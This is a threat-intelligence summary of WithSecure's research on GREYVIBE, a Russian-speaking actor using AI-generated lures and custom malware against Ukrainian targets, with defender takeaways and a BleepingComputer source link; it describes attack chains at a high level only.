Summaries

GREYVIBE — AI-Powered Cyberattacks Targeting Ukraine With Custom Tooling

GREYVIBE is a Russian-speaking threat actor using AI-generated lures, custom malware, and multi-vector campaigns to target Ukrainian military, government, and civilian entities since August 2025.

View on Graph

Summary

WithSecure has documented GREYVIBE, a Russian-speaking threat actor active since at least August 2025, targeting Ukrainian and Ukraine-related organizations with AI-assisted cyberattack campaigns. The group operates in the grey area between state-aligned espionage and cybercrime, using generative AI to supercharge its operations.

GREYVIBE employs five distinct attack chains. PhantomMail uses spear-phishing emails with malicious ZIP/RAR archives hosted on Google Drive and 4sync, deploying JavaScript-based loaders that deliver the PhantomRelay PowerShell RAT. PhantomClick uses ClickFix-style fake CAPTCHA pages on spoofed Zoom and LAPAS domains to trick users into running self-infecting commands. PrincessClub operates fake Ukrainian adult/dating websites to deliver FallSpy Android spyware and PhantomRelay/LegionRelay Windows malware, including WebRTC-based live calls that capture victim audio/video. DroneLink uses fake Ukrainian military charity websites themed around FPV drones to deliver WireGuard VPN tunneling and LegionRelay. Nebo deploys a FallSpy variant disguised as a Russian military communication terminal login page.

The group relies heavily on generative AI. Images and lure content are produced using Ideogram AI, OpenAI ChatGPT, and Google Gemini. Custom obfuscators (LOOKVALPS, LOOKVALJS, DAYLIGHT, TEASOUP) and the LegionRelay RAT were likely developed with LLM assistance. The PowerShell-based LegionRelay supports file theft, screenshot capture, browser credential theft, Telegram/WhatsApp exfiltration, and RDP access setup. PhantomRelay provides system fingerprinting, dynamic script loading, and command execution.

AI-generated phishing pages and decoy documents (WithSecure)

GREYVIBE shares infrastructure and personnel ties with the Russian cybercrime ecosystem. Indicators include a unique ISO builder linked to former TrickBot members (UAC-0098), PhantomRelay variants appearing in unrelated cybercrime campaigns, XMRig miner deployment on victim machines, and operational security blunders like uploading test samples to VirusTotal. WithSecure assesses with moderate confidence that the group includes current or former cybercriminal members operating under state direction or as a hybrid team.

Why It Matters

GREYVIBE represents a new model of threat actor: a hybrid group that combines state-aligned targeting priorities with cybercrime-sourced tooling and AI-generated operational capability. The use of AI to create lures, develop malware, and generate obfuscation scripts lowers the barrier to sophisticated targeting. The group’s rapid iteration — five distinct attack chains with varying lures and delivery mechanisms — shows how AI enables operational tempo that would require much larger teams without AI assistance. For defenders, this means traditional attribution methods based on stable technical artifacts become less reliable as AI-assisted groups can refactor components faster than clustering algorithms can track.

Defender Takeaways

  • Deploy detection rules for PhantomRelay PowerShell RAT patterns: system fingerprinting, dynamic script loading, and encoded PowerShell commands.
  • Monitor for ClickFix-style CAPTCHA pages on suspicious domains — this is a growing delivery mechanism used by multiple threat actors.
  • Review supplier risk for fake charity and adult website infrastructure that could serve as delivery vectors.
  • Include GREYVIBE IOCs (provided by WithSecure on GitHub) in threat intel feeds.
  • Treat ANY.RUN/VirusTotal uploads as potential operational security failures that may reveal new tools and techniques.
  • Monitor for XMRig miner alongside espionage tooling — crypto-miner co-deployment is a GREYVIBE signature.
  • Watch for AI-generated phishing content: lures with inconsistent metadata or subtly unnatural image artifacts.

Source

Title: GreyVibe Hackers Use ChatGPT, Gemini to Power Cyberattacks — BleepingComputer
URL: https://www.bleepingcomputer.com/news/security/greyvibe-hackers-use-chatgpt-gemini-to-power-cyberattacks/